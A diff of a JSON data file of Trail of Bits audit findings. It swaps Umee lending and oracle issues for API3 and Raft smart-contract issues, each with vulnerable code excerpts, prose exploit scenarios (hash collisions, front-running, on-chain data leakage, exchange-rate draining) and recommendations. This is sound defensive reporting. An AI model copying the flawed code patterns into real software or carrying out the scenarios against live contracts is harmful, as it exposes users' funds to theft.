Determine whether the Rust functions should allow arbitrary-length inputs; document the length requirements and assumptions. Long term, regularly run Clippy in pedantic mode to find and fix all potentially dangerous casts.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "15. Attempts to overdraw collateral cause WithdrawAsset to panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The WithdrawAsset function panics when an account attempts to withdraw more collateral than the account holds. While panics triggered during transaction runs are recovered by the Cosmos SDK , they should be used only to handle unexpected events that should not occur in normal blockchain operations. The function should instead check the collateralToWithdraw value and return an error if it is too large. The panic occurs in the Dec.Sub method when the calculation it performs results in an overow (gure 15.1). 
func (k Keeper) WithdrawAsset( /* (...) */ ) error { // (...) if amountFromCollateral.IsPositive() { if k.GetCollateralSetting(ctx, lenderAddr, uToken.Denom) { // (...) // Calculate what borrow limit will be AFTER this withdrawal collateral := k.GetBorrowerCollateral(ctx, lenderAddr) collateralToWithdraw := sdk.NewCoins(sdk.NewCoin(uToken.Denom, amountFromCollateral)) newBorrowLimit, err := k.CalculateBorrowLimit(ctx, collateral.Sub(collateralToWithdraw) ) Figure 15.1: umee/x/leverage/keeper/keeper.go#L124-L159 To reproduce this issue, use the test shown in gure 15.2. Exploit Scenario A user of the Umee system who has enabled the collateral setting lends 1,000 UMEE tokens. The user later tries to withdraw 1,001 UMEE tokens. Due to the lack of validation of the collateralToWithdraw value, the transaction causes a panic. However, the panic is recovered, and the transaction nishes with a panic error . Because the system does not provide a proper error message, the user is confused about why the transaction failed. Recommendations Short term, when a user attempts to withdraw collateral, have the WithdrawAsset function check whether the collateralToWithdraw value is less than or equal to the collateral balance of the users account and return an error if it is not. This will prevent the function from panicking if the withdrawal amount is too large. Long term, integrate the test shown in gure 15.2 into the codebase and extend it with additional assertions to verify other program states. func (s *IntegrationTestSuite) TestWithdrawAsset_InsufficientCollateral() { app, ctx := s.app, s.ctx lenderAddr := sdk.AccAddress([] byte ( \"addr________________\" )) lenderAcc := app.AccountKeeper.NewAccountWithAddress(ctx, lenderAddr) app.AccountKeeper.SetAccount(ctx, lenderAcc) // mint and send coins s.Require().NoError(app.BankKeeper.MintCoins(ctx, minttypes.ModuleName, initCoins)) s.Require().NoError(app.BankKeeper.SendCoinsFromModuleToAccount(ctx, minttypes.ModuleName, lenderAddr, initCoins)) // mint additional coins for just the leverage module; this way it will have available reserve // to meet conditions in the withdrawal logic s.Require().NoError(app.BankKeeper.MintCoins(ctx, types.ModuleName, initCoins)) // set collateral setting for the account uTokenDenom := types.UTokenFromTokenDenom(umeeapp.BondDenom) err := s.app.LeverageKeeper.SetCollateralSetting(ctx, lenderAddr, uTokenDenom, true ) s.Require().NoError(err) // lend asset err = s.app.LeverageKeeper.LendAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 1000000000 )) // 1k umee s.Require().NoError(err) // verify collateral amount and total supply of minted uTokens collateral := s.app.LeverageKeeper.GetCollateralAmount(ctx, lenderAddr, uTokenDenom) expected := sdk.NewInt64Coin(uTokenDenom, 1000000000 ) // 1k u/umee s.Require().Equal(collateral, expected) supply := s.app.LeverageKeeper.TotalUTokenSupply(ctx, uTokenDenom) s.Require().Equal(expected, supply) // withdraw more collateral than having - this panics currently uToken := collateral.Add(sdk.NewInt64Coin(uTokenDenom, 1 )) err = s.app.LeverageKeeper.WithdrawAsset(ctx, lenderAddr, uToken) s.Require().EqualError(err, \"TODO/FIXME: set proper error string here after fixing panic error\" ) // TODO/FIXME: add asserts to verify all other program state } Figure 15.2: A test that can be used to reproduce this issue", + "title": "1. 
Publish-subscribe protocol users are vulnerable to a denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The API3 system implements a publish-subscribe protocol through which a requester can receive a callback from an API when specified conditions are met. These conditions can be hard-coded when the Airnode is configured or stored on-chain. When they are stored on-chain, the user can call storeSubscription to establish other conditions for the callback (by specifying parameters and conditions arguments of type bytes). The arguments are then used in abi.encodePacked, which could result in a subscriptionId collision. function storeSubscription( [...] bytes calldata parameters, bytes calldata conditions, [...] ) external override returns (bytes32 subscriptionId) { [...] subscriptionId = keccak256(abi.encodePacked( chainId, airnode, templateId, parameters, conditions, relayer, sponsor, requester, fulfillFunctionId )); subscriptions[subscriptionId] = Subscription({ chainId: chainId, airnode: airnode, templateId: templateId, parameters: parameters, conditions: conditions, relayer: relayer, sponsor: sponsor, requester: requester, fulfillFunctionId: fulfillFunctionId }); Figure 1.1: StorageUtils.sol#L135-L158 The Solidity documentation includes the following warning: If you use keccak256(abi.encodePacked(a, b)) and both a and b are dynamic types, it is easy to craft collisions in the hash value by moving parts of a into b and vice-versa. More specifically, abi.encodePacked(\"a\", \"bc\") == abi.encodePacked(\"ab\", \"c\"). If you use abi.encodePacked for signatures, authentication or data integrity, make sure to always use the same types and check that at most one of them is dynamic. Unless there is a compelling reason, abi.encode should be preferred. Figure 1.2: The Solidity documentation details the risk of a collision caused by the use of abi.encodePacked with more than one dynamic type. Exploit Scenario Alice calls storeSubscription to set the conditions for a callback from a specific API to her smart contract. Eve, the owner of a competitor protocol, calls storeSubscription with the same arguments as Alice but moves the last byte of the parameters argument to the beginning of the conditions argument. As a result, the Airnode will no longer report API results to Alice's smart contract. Recommendations Short term, use abi.encode instead of abi.encodePacked. Long term, carefully review the Solidity documentation, particularly the Warning sections regarding the pitfalls of abi.encodePacked.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Low" ] }, { - "title": "16. Division by zero causes the LiquidateBorrow function to panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Two operations in the x/leverage modules LiquidateBorrow method may involve division by zero and lead to a panic. The rst operation is shown in gure 16.1. If both repayValue and maxRepayValue are zero, the GTE (greater-than-or-equal-to) comparison will succeed, and the Quo method will panic. The repayValue variable will be set to zero if liquidatorBalance is set to zero; maxRepayValue will be set to zero if either closeFactor or borrowValue is set to zero. 
if repayValue.GTE(maxRepayValue) { // repayment *= (maxRepayValue / repayValue) repayment.Amount = repayment.Amount.ToDec().Mul(maxRepayValue) .Quo(repayValue) .TruncateInt() repayValue = maxRepayValue } Figure 16.1: A potential instance of division by zero ( umee/x/leverage/keeper/keeper.go#452456 ) The second operation is shown in gure 16.2. If both reward.Amount and collateral.AmountOf(rewardDenom) are set to zero, the GTE comparison will succeed, and the Quo method will panic. The collateral.AmountOf(rewardDenom) variable can easily be set to zero, as the user may not have any collateral in the denomination indicated by the variable; reward.Amount will be set to zero if liquidatorBalance is set to zero. // reward amount cannot exceed available collateral if reward.Amount.GTE(collateral.AmountOf(rewardDenom)) { // reduce repayment.Amount to the maximum value permitted by the available collateral reward repayment.Amount = repayment.Amount.Mul(collateral.AmountOf(rewardDenom)) .Quo(reward.Amount) // use all collateral of reward denom reward.Amount = collateral.AmountOf(rewardDenom) } Figure 16.2: A potential instance of division by zero ( umee/x/leverage/keeper/keeper.go#474480 ) Exploit Scenario A user tries to liquidate a loan. For reasons that are unclear to the user, the transaction fails with a panic. Because the error message is not specic, the user has diculty debugging the error. Recommendations Short term, replace the GTE comparison with a strict inequality GT (greater-than) comparison. Long term, carefully validate variables in the LiquidateBorrow method to ensure that every variable stays within the expected range during the entire computation . Write negative tests with edge-case values to ensure that the methods handle errors gracefully.", + "title": "2. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The API3 contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the API3 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. 
Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "17. Architecture-dependent code ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "In the Go programming language, the bit size of an int variable depends on the platform on which the code is executed. On a 32-bit platform, it will be 32 bits, and on a 64-bit platform, 64 bits. Validators running on dierent architectures will therefore interpret int types dierently, which may lead to transaction-parsing discrepancies and ultimately to a consensus failure or chain split. One use of the int type is shown in gure 17.1. Because casting the maxValidators variable to the int type should not cause it to exceed the maximum int value for a 32-bit platform, we set the severity of this nding to informational. for ; iterator.Valid() && i < int (maxValidators) ; iterator.Next() { Figure 17.1: An architecture-dependent loop condition in the EndBlocker method ( umee/x/oracle/abci.go#34 ) Exploit Scenario The maxValidators variable (a variable of the uint32 type) is set to its maximum value, 4,294,967,296. During the execution of the x/oracle modules EndBlocker method, some validators cast the variable to a negative number, while others cast it to a large positive integer. The chain then stops working because the validators cannot reach a consensus. Recommendations Short term, ensure that architecture-dependent types are not used in the codebase . Long term, test the system with parameters set to various edge-case values, including the maximum and minimum values of dierent integer types. Test the system on all common architectures (e.g., architectures with 32- and 64-bit CPUs), or develop documentation specifying the architecture(s) used in testing.", + "title": "3. Decisions to opt out of a monetization scheme are irreversible ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The API3 protocol implements two on-chain monetization schemes. If an Airnode owner decides to opt out of a scheme, the Airnode will not receive additional token payments or deposits (depending on the scheme). Although the documentation states that Airnodes can opt back in to a scheme, the current implementation does not allow it. /// @notice If the Airnode is participating in the scheme implemented by /// the contract: /// Inactive: The Airnode is not participating, but can be made to /// participate by a mantainer /// Active: The Airnode is participating /// OptedOut: The Airnode actively opted out, and cannot be made to /// participate unless this is reverted by the Airnode mapping(address => AirnodeParticipationStatus) public override airnodeToParticipationStatus; Figure 3.1: RequesterAuthorizerWhitelisterWithToken.sol#L59-L68 /// @notice Sets Airnode participation status /// @param airnode Airnode address /// @param airnodeParticipationStatus Airnode participation status function setAirnodeParticipationStatus( address airnode, AirnodeParticipationStatus airnodeParticipationStatus ) external override onlyNonZeroAirnode(airnode) { if (msg.sender == airnode) { require( airnodeParticipationStatus == AirnodeParticipationStatus.OptedOut, \"Airnode can only opt out\" ); } else { [...] 
Figure 3.2: RequesterAuthorizerWhitelisterWithToken.sol#L229-L242 Exploit Scenario Bob, an Airnode owner, decides to temporarily opt out of a scheme, believing that he will be able to opt back in; however, he later learns that that is not possible and that his Airnode will be unable to accept any new requesters. Recommendations Short term, adjust the setAirnodeParticipationStatus function to allow Airnodes that have opted out of a scheme to opt back in. Long term, write extensive unit tests that cover all of the expected pre- and postconditions. Unit tests could have uncovered this issue.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "18. Weak cross-origin resource sharing settings ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "In the price-feeder s cross-origin resource sharing (CORS) settings, most of the same-origin policy protections are disabled. This increases the severity of vulnerabilities like cross-site request forgery. v1Router.Methods( \"OPTIONS\" ).HandlerFunc( func (w http.ResponseWriter, r *http.Request) { w.Header().Set( \"Access-Control-Allow-Origin\" , r.Header.Get( \"Origin\" )) w.Header().Set( \"Access-Control-Allow-Methods\" , \"GET, PUT, POST, DELETE, OPTIONS\" ) w.Header().Set( \"Access-Control-Allow-Headers\" , \"Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With\" ) w.Header().Set( \"Access-Control-Allow-Credentials\" , \"true\" ) w.WriteHeader(http.StatusOK) }) Figure 18.1: The current CORS conguration ( umee/price-feeder/router/v1/router.go#4652 ) We set the severity of this nding to informational because no sensitive endpoints are exposed by the price-feeder router. Exploit Scenario A new endpoint is added to the price-feeder API. It accepts PUT requests that can update the tools provider list. An attacker uses phishing to lure the price-feeder s operator to a malicious website. The website triggers an HTTP PUT request to the API, changing the provider list to a list in which all addresses are controlled by the attacker. The attacker then repeats the attack against most of the validators, manipulates on-chain prices, and drains the systems funds. Recommendations Short term, use strong default values in the CORS settings . Long term, ensure that APIs exposed by the price-feeder have proper protections against web vulnerabilities.", + "title": "4. Depositors can front-run request-blocking transactions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "A depositor can front-run a request-blocking transaction and withdraw his or her deposit. The RequesterAuthorizerWhitelisterWithTokenDeposit contract enables a user to indefinitely whitelist a requester by depositing tokens on behalf of the requester. A manager or an address with the blocker role can call setRequesterBlockStatus or setRequesterBlockStatusForAirnode with the address of a requester to block that user from submitting requests; as a result, any user who deposited tokens to whitelist the requester will be blocked from withdrawing the deposit. However, because one can execute a withdrawal immediately, a depositor could monitor the transactions and call withdrawTokens to front-run a blocking transaction. Exploit Scenario Eve deposits tokens to whitelist a requester. 
Because the requester then uses the system maliciously, the manager blacklists the requester, believing that the deposited tokens will be seized. However, Eve front-runs the transaction and withdraws the tokens. Recommendations Short term, implement a two-step withdrawal process in which a depositor has to express his or her intention to withdraw a deposit and the funds are then unlocked after a waiting period. Long term, analyze all possible front-running risks in the system.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "19. price-feeder is at risk of rate limiting by public APIs ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Price providers used by the price-feeder tool may enforce limits on the number of requests served to them. After reaching a limit, the tool should take certain actions to avoid a prolonged or even permanent ban. Moreover, using API keys or non-HTTP access channels would decrease the price-feeder s chance of being rate limited. Every API has its own rules, which should be reviewed and respected. The rules of three APIs are summarized below. Binance has hard, machine-learning, and web application rewall limits . Users are required to stop sending requests if they receive a 429 HTTP response code . Kraken implements rate limiting based on call counters and recommends using the WebSockets API instead of the REST API. Huopi restricts the number of requests to 10 per second and recommends using an API key. Exploit Scenario A price-feeder exceeds the limits of the Binance API. It is rate limited and receives a 429 HTTP response code from the API. The tool does not notice the response code and continues to spam the API. As a result, it receives a permanent ban. The validator using the price-feeder then starts reporting imprecise exchange rates and gets slashed. Recommendations Short term, review the requirements and recommendations of all APIs supported by the system . Enforce their requirements in a user-friendly manner; for example, allow users to set and rotate API keys, delay HTTP requests so that the price-feeder will avoid rate limiting but still report accurate prices, and log informative error messages upon reaching rate limits. Long term, perform stress-testing to ensure that the implemented safety checks work properly and are robust.", + "title": "5. Incompatibility with non-standard ERC20 tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The RequesterAuthorizerWhitelisterWithTokenPayment and RequesterAuthorizerWhitelisterWithTokenDeposit contracts are meant to work with any ERC20 token. However, several high-profile ERC20 tokens do not correctly implement the ERC20 standard. These include USDT, BNB, and OMG, all of which have a large market cap. The ERC20 standard defines two transfer functions, among others: transfer(address _to, uint256 _value) public returns (bool success) transferFrom(address _from, address _to, uint256 _value) public returns (bool success) These high-profile ERC20 tokens do not return a boolean when at least one of the two functions is executed. As of Solidity 0.4.22, the size of return data from external calls is checked. As a result, any call to the transfer or transferFrom function of an ERC20 token with an incorrect return value will fail. Exploit Scenario Bob deploys the RequesterAuthorizerWhitelisterWithTokenPayment contract with USDT as the token. 
Alice wants to pay for a requester to be whitelisted and calls payTokens, but the transferFrom call fails. As a result, the contract is unusable. Recommendations Short term, consider using the OpenZeppelin SafeERC20 library or adding explicit support for ERC20 tokens with incorrect return values. Long term, adhere to the token integration best practices outlined in appendix C.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: Medium" ] }, { - "title": "20. Lack of prioritization of oracle messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Oracle messages are not prioritized over other transactions for inclusion in a block. If the network is highly congested, the messages may not be included in a block. Although the Umee system could increase the fee charged for including an oracle message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35, which returns a priority argument Reimplementing part of the Tendermint engine, as Terra Money did Using Substrate's dispatch classes, which allow developers to mark transactions as normal, operational, or mandatory Exploit Scenario The Umee network is congested. Validators send their exchange rate votes, but the exchange rates are not included in a block. An attacker then exploits the situation by draining the network of its tokens. Recommendations Short term, use a custom CheckTx method to prioritize oracle messages. This will help prevent validators' votes from being left out of a block and ignored by an oracle. Long term, ensure that operations that affect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", + "title": "6. Compromise of a single oracle enables limited control of the dAPI value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "By compromising only one oracle, an attacker could gain control of the median price of a dAPI and set it to a value within a certain range. The dAPI value is the median of all values provided by the oracles. If the number of oracles is odd (i.e., the median is the value in the center of the ordered list of values), an attacker could skew the median, setting it to a value between the lowest and highest values submitted by the oracles. Exploit Scenario There are three available oracles: O0, with a price of 603; O1, with a price of 598; and O2, which has been compromised by Eve. Eve is able to set the median price to any value in the range [598, 603]. Eve can then turn a profit by adjusting the rate when buying and selling assets. Recommendations Short term, be mindful of the fact that there is no simple fix for this issue; regardless, we recommend implementing off-chain monitoring of the DapiServer contracts to detect any suspicious activity. Long term, assume that an attacker may be able to compromise some of the oracles. To mitigate a partial compromise, ensure that dAPI value computations are robust.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, {
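Editor's aside: the range in finding 6 is easy to make concrete with a small Python sketch, assuming the simple ordered-middle median the finding describes. With honest prices 598 and 603, the compromised oracle O2 can steer the median anywhere in [598, 603], but not outside it.

def dapi_value(prices):
    """Median as described in the finding: middle of the ordered list (odd count)."""
    ordered = sorted(prices)
    return ordered[len(ordered) // 2]

honest = [603, 598]
for attacker_price in (0, 600, 10**9):
    # The attacker's report only ever selects a value between the honest extremes.
    print(attacker_price, dapi_value(honest + [attacker_price]))
# -> 598, 600, 603: Eve can pick any value in [598, 603], never outside it.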
- "title": "21. Risk of token/uToken exchange rate manipulation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Umee specification states that the token/uToken exchange rate can be affected only by the accrual of interest (not by Lend, Withdraw, Borrow, Repay, or Liquidate transactions). However, this invariant can be broken: When tokens are burned or minted through an Inter-Blockchain Communication (IBC) transfer, the ibc-go library accesses the x/bank module's keeper interface, which changes the total token supply (as shown in figure 21.2). This behavior is mentioned in a comment shown in figure 22.1. Sending tokens directly to the module through an x/bank message also affects the exchange rate. func (k Keeper) TotalUTokenSupply(ctx sdk.Context, uTokenDenom string ) sdk.Coin { if k.IsAcceptedUToken(ctx, uTokenDenom) { return k.bankKeeper.GetSupply(ctx, uTokenDenom) // TODO - Question: Does bank module still track balances sent (locked) via IBC? // If it doesn't then the balance returned here would decrease when the tokens // are sent off, which is not what we want. In that case, the keeper should keep // an sdk.Int total supply for each uToken type. } return sdk.NewCoin(uTokenDenom, sdk.ZeroInt()) } Figure 21.1: The method vulnerable to unexpected IBC transfers ( umee/x/leverage/keeper/keeper.go#65-73 ) if err := k.bankKeeper.BurnCoins( ctx, types.ModuleName, sdk.NewCoins(token), Figure 21.2: The IBC library code that accesses the x/bank module's keeper interface ( ibc-go/modules/apps/transfer/keeper/relay.go#136-137 ) Exploit Scenario An attacker with two Umee accounts lends tokens through the system and receives a commensurate number of uTokens. He temporarily sends the uTokens from one of the accounts to another chain (chain B), decreasing the total supply and increasing the token/uToken exchange rate. The attacker uses the second account to withdraw more tokens than he otherwise could and then sends uTokens back from chain B to the first account. In this way, he drains funds from the module. Recommendations Short term, ensure that the TotalUTokenSupply method accounts for IBC transfers. Use the Cosmos SDK's blocklisting feature to disable direct transfers to the leverage and oracle modules. Consider setting DefaultSendEnabled to false and explicitly enabling certain tokens' transfer capabilities. Long term, follow GitHub issues #10386 and #5931, which concern functionalities that may enable module developers to make token accounting more reliable. Additionally, ensure that the system accounts for inflation.", + "title": "7. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The execution of yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repositories under review. The output below details these issues. CVE ID", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "22. Collateral dust prevents the designation of defaulted loans as bad debt ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "An account's debt is considered bad debt only if its collateral balance drops to zero. 
The debt is then repaid from the module's reserves. However, users may liquidate the majority of an account's assets but leave a small amount of debt unpaid. In that case, the transaction fees may make liquidation of the remaining collateral unprofitable. As a result, the bad debt will not be paid from the module's reserves and will linger in the system indefinitely. Exploit Scenario A large loan taken out by a user becomes highly undercollateralized. An attacker liquidates most of the user's collateral to repay the loan but leaves a very small amount of the collateral unliquidated. As a result, the loan is not considered bad debt and is not paid from the reserves. The rest of the tokens borrowed by the user remain out of circulation, preventing other users from withdrawing their funds. Recommendations Short term, establish a lower limit on the amount of collateral that must be liquidated in one transaction to prevent accounts from holding dust collateral. Long term, establish a lower limit on the number of tokens to be used in every system operation. That way, even if the system's economic incentives are lacking, the operations will not result in dust tokens.", + "title": "8. DapiServer beacon data is accessible to all users ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The lack of access controls on the conditionPspDapiUpdate function could allow an attacker to read private data on-chain. The dataPoints[] mapping contains private data that is supposed to be accessible on-chain only by whitelisted users. However, any user can call conditionPspDapiUpdate, which returns a boolean that depends on arithmetic over dataPoint : /// @notice Returns if the respective dAPI needs to be updated based on the /// condition parameters /// @dev This method does not allow the caller to indirectly read a dAPI, /// which is why it does not require the sender to be a void signer with /// zero address. [...] function conditionPspDapiUpdate( bytes32 subscriptionId, // solhint-disable-line no-unused-vars bytes calldata data, bytes calldata conditionParameters ) external override returns (bool) { bytes32 dapiId = keccak256(data); int224 currentDapiValue = dataPoints[dapiId].value; require( dapiId == updateDapiWithBeacons(abi.decode(data, (bytes32[]))), \"Data length not correct\" ); return calculateUpdateInPercentage( currentDapiValue, dataPoints[dapiId].value ) >= decodeConditionParameters(conditionParameters); } Figure 8.1: dapis/DapiServer.sol:L468-L502 An attacker could abuse this function to deduce one bit of data per call (to determine, for example, whether a user's account should be liquidated). An attacker could also automate the process of accessing one bit of data to extract a larger amount of information by using a mechanism such as a dichotomic search. An attacker could therefore infer the value of dataPoint directly on-chain. Exploit Scenario Eve, who is not whitelisted, wants to read a beacon value to determine whether a certain user's account should be liquidated. Using the code provided in appendix E, she is able to confirm that the beacon value is greater than or equal to a certain threshold. Recommendations Short term, implement access controls to limit who can call conditionPspDapiUpdate. Long term, document all read and write operations related to dataPoint, and highlight their access controls. Additionally, consider implementing an off-chain monitoring system to detect any suspicious activity.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, {
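Editor's aside: the dichotomic search mentioned in finding 8 is plain bisection over the one-bit "is the value at least this threshold?" oracle. In the sketch below, the hypothetical is_at_least callable stands in for the repeated on-chain calls to conditionPspDapiUpdate; each query halves the candidate range, so a 32-bit value leaks in roughly 32 calls.

def extract_value(is_at_least, lo=0, hi=2**32):
    """Recover a hidden integer using only >=-threshold queries (bisection)."""
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if is_at_least(mid):   # one bit of information per (on-chain) call
            lo = mid
        else:
            hi = mid - 1
    return lo

secret = 1_234_567
oracle = lambda threshold: secret >= threshold  # stand-in for the leaky function
assert extract_value(oracle) == secret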
- "title": "23. Users can borrow assets that they are actively using as collateral ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "When a user calls the BorrowAsset function to take out a loan, the function does not check whether the user is borrowing the same type of asset as the collateral he or she supplied. In other words, a user can borrow tokens from the collateral that the user supplied. The Umee system prohibits users from borrowing assets worth more than the collateral they have provided, so a user cannot directly exploit this issue to borrow more funds than the user should be able to borrow. However, a user can borrow the vast majority of his or her collateral to continue accumulating lending rewards while largely avoiding the risks of providing collateral. Exploit Scenario An attacker provides 10 ATOMs to the protocol as collateral and then immediately borrows 9 ATOMs. He continues to earn lending rewards on his collateral but retains the use of most of the collateral. The attacker, through flash loans, could also resupply the borrowed amount as collateral and then immediately take out another loan, repeating the process until the amount he had borrowed asymptotically approached the amount of liquidity he had provided. Recommendations Short term, determine whether borrowers' ability to borrow their own collateral is an issue. (Note that Compound's front end disallows such operations, but its actual contracts do not.) If it is, have BorrowAsset check whether a user is attempting to borrow the same asset that he or she staked as collateral and block the operation if so. Alternatively, ensure that borrow fees are greater than profits from lending. Long term, assess whether the liquidity-mining incentives accomplish their intended purpose, and ensure that the lending incentives and borrowing costs work well together.", + "title": "9. Misleading function name ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The conditionPspDapiUpdate function always updates the dataPoints storage variable (by calling updateDapiWithBeacons ), even if the function returns false (i.e., the condition for updating the variable is not met). This contradicts the code comment and the behavior implied by the function's name. /// @notice Returns if the respective dAPI needs to be updated based on the /// condition parameters [...] function conditionPspDapiUpdate( bytes32 subscriptionId, // solhint-disable-line no-unused-vars bytes calldata data, bytes calldata conditionParameters ) external override returns (bool) { bytes32 dapiId = keccak256(data); int224 currentDapiValue = dataPoints[dapiId].value; require( dapiId == updateDapiWithBeacons(abi.decode(data, (bytes32[]))), \"Data length not correct\" ); return calculateUpdateInPercentage( currentDapiValue, dataPoints[dapiId].value ) >= decodeConditionParameters(conditionParameters); } Figure 9.1: dapis/DapiServer.sol#L468-L502 Recommendations Short term, revise the documentation to inform users that a call to conditionPspDapiUpdate will update the dAPI even if the function returns false. Alternatively, develop a function similar to updateDapiWithBeacons that returns the updated value without actually updating it. Long term, ensure that function names reflect the implementation.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Informational", "Difficulty: Low" ] }, {
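Editor's aside: the alternative recommendation in finding 9 amounts to command-query separation — keep a read-only "what would the update be?" query next to the state-changing update. A Python sketch of that split; the names (peek_update, apply_update) and the median aggregation are illustrative, not the DapiServer API.

class Beacon:
    """Sketch: separate a read-only preview from the actual mutation."""

    def __init__(self, value=0):
        self.value = value

    def peek_update(self, readings):
        # Pure query: computes the candidate value without touching state.
        return sorted(readings)[len(readings) // 2]

    def apply_update(self, readings):
        # Explicit command: the only place state actually changes.
        self.value = self.peek_update(readings)
        return self.value

b = Beacon()
candidate = b.peek_update([3, 1, 2])  # b.value is still 0 here
assert b.value == 0 and candidate == 2
b.apply_update([3, 1, 2])
assert b.value == 2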
- "title": "24. Providing additional collateral may be detrimental to borrowers in default ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "When a user who is in default on a loan deposits additional collateral, the collateral will be immediately liquidatable. This may be surprising to users and may affect their satisfaction with the system. Exploit Scenario A user funds a loan and plans to use the coins he deposited as the collateral on a new loan. However, the user does not realize that he defaulted on a previous loan. As a result, bots instantly liquidate the new collateral he provided. Recommendations Short term, if a user is in default on a loan, consider blocking the user from calling the LendAsset or SetCollateralSetting function with an amount of collateral insufficient to collateralize the defaulted position. Alternatively, document the risks associated with calling these functions when a user has defaulted on a loan. Long term, ensure that users cannot incur unexpected financial damage, or document the financial risks that users face.", + "title": "1. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft Finance contracts have enabled compiler optimizations. There have been several optimization bugs with security implications. Additionally, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them, so how well they are being tested and exercised is unknown. High-severity security issues due to optimization bugs have occurred in the past. For example, a high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity v0.5.6. More recently, a bug due to the incorrect caching of Keccak-256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Raft Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3662,19 +6360,19 @@ ] }, { - "title": "25. Insecure storage of price-feeder keyring passwords ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Users can store oracle keyring passwords in the price-feeder configuration file. However, the price-feeder stores these passwords in plaintext and does not provide a warning if the configuration file has overly broad permissions (like those shown in figure 25.1). 
